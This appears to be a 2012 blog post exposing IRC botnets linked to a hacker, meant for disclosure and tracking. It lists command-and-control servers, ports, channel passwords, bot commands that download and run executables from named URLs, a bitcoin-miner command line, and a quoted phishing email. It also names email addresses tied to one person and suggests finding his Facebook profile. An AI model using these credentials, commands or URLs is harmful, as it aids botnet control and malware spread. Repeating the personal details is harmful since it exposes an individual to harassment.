Mystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

As Mystical has now recently been banned from hackforums, I thought I would make an informative megapost of botnets he has or is currently using. Domains Bighecker.co 1212Mystic0801.info Sonic4us.com Sonic4me.com img196-imageshack.us rs-booter.com modtech360.info 307dice.com powerbot24.com img90-imageshack.com imageshells.com bighecks.net emails used for registration hlolgame@aim.com mikeydoc@hotmail.com #plug this into facebook to see his profile highroller098765@hotmail.com mikeshosting@yahoo.com bram.fadzulani@mail.com

vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

Resolved vandersand.no-ip.biz to 199.115.230.138 Server: vandersand.no-ip.biz Port:  6654 Channel: #Insomnia Channel password: frosty * Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5 * Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012 Botnick: {IT|XP-32a}uwryxvf While I was in the channel he downloaded a bitcoin miner Dextermania.exe  hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924 Hosting

hacking-scene.ru (Athena ircbot hosted by Romania Voxility S.r.l.)

Still more Athena bots Resolved hacking-scene.ru to 109.163.233.110 Server: hacking-scene.ru  Port: 34791 Password: 31337gAlAg23gnmbx331 Channel: #mafia Password: hellas  #mafia           31      [+smntVMCuTk]  Current Global Users: 31  Max: 269  Hosting infos: http://whois.domaintools.com/109.163.233.110

cmjc.no-ip.biz (Athena ircbot hosted by France Roubaix Ovh Systems)

Found more athena nets Resolved cmjc.no-ip.biz to 5.39.44.120 Server: cmjc.no-ip.biz Port: 6667 Channel:  #kam  #kam             14      [+smntrVCT] Channel: #vanrikki Password: wiitasauce3991 #vanrikki        44      [+sntrVCTk]  Server is one of those used by cmjc.whhcd.info I’m not sure why they used a no-ip for these bots, anyone can get that suspended easily. The servers host lots of skids,

cmjc.whhcd.info (Athena ircbot hosted by France Roubaix Ovh Systems)

Resolved cmjc.whhcd.info to 5.39.44.120 Resolved cmjc.whhcd.info to 176.31.33.45 Resolved cmjc.whhcd.info to 46.105.36.229 Server: cmjc.whhcd.info Port: 6667 Channel:  #MuustaHF Channel password: hejij3cdp Opers:Ddos * [Ddos] (Ddos@I.Will.DDOS.Your.Ass): Ddos * [Ddos] is a registered nick * [Ddos] services.whhcd.info :Services for IRC Networks * [Ddos] idle 158:10:19, signon: Wed Aug 29 23:26:30 * [Ddos] End of WHOIS list. MuustaHF

gtfo.myprivatefile.com(irc botnet hosted in United States Clifton Park Search Guide Inc)

Resolved : [gtfo.myprivatefile.com] To [184.106.87.139] Resolved : [gtfo.myprivatefile.com] To [66.152.109.69 13] Resolved : [gtfo.myprivatefile.com] To [69.16.143.69 13] Remote Host Port Number gtfo.myprivatefile.com 1337 PASS google_cache1tfsg4.tmp NICK X[USA][XP-SP2]150351 USER 9092 “” “lol” :9092 JOIN #swarm swarm NICK {NEW}X[USA][XP-SP2]020911 USER 0441 “” “lol” :0441 NICK X[USA][XP-SP2]075732 USER 5218 “” “lol” :5218 hosting infos: http://whois.domaintools.com/66.152.109.69

blah.swapixtreme.com(irc botnet hosted in United Kingdom Vooservers Ltd)

Resolved : [blah.swapixtreme.com] To [91.227.221.217] Clients: I have 308 clients and 1 servers Local users: Current Local Users: 308 Max: 1 Global users: Current Global Users: 309 Max: 1105 Remote Host Port Number blah.swapixtreme.com 7878 NICK [GSA]-274266 USER hhzegr 0 0 :[GSA]-274266 USERHOST [GSA]-274266 MODE [GSA]-274266 +xt JOIN #b imallowed2020 hosting infos: http://whois.domaintools.com/91.227.221.217

Paypal Phishing Script hosted in Brazil Sao Paulo Telemar Norte Leste S.a.

I got this email today in my spam folder: Dear valued PayPal Customer, We’re constantly working to make PayPal safer, simpler and more convenient for our customers. This means that from time to time we have to verify and keep up to date your account. It has come to our attention that your PayPal account

kca.hopto.org(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Resolved : [kca.hopto.org] To [88.255.116.48] Server: 88.255.116.48:1453 Nick: new[iRooT-XP-AUT]990453 Username: 9904 Server Pass: KCA Joined Channel: #XXX with Password KCA Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html” Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!” Private Message to Channel #XXX: “[Download]: Executed Successfully” Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09Spreading

deuxexhre.org (ngrbot hosted by Romania Voxility)

deuxexhre.org resolved to 37.221.160.38 Server: deuxexhre.org Port: 1090 Password: romeo Channel: ##str Channel Password: romeo Channel topic: * Topic for ##str is: *mdns http://alfonsoelpidio.com/hosts * Topic for ##str set by drek0 at Wed Aug 29 11:22:21 2012 Bot sample from http://oberheimdmx.blogspot.co.uk/2012/08/dorkbot-falso-mensaje-de-amorenlinea.html Hosting infos: http://whois.domaintools.com/37.221.160.38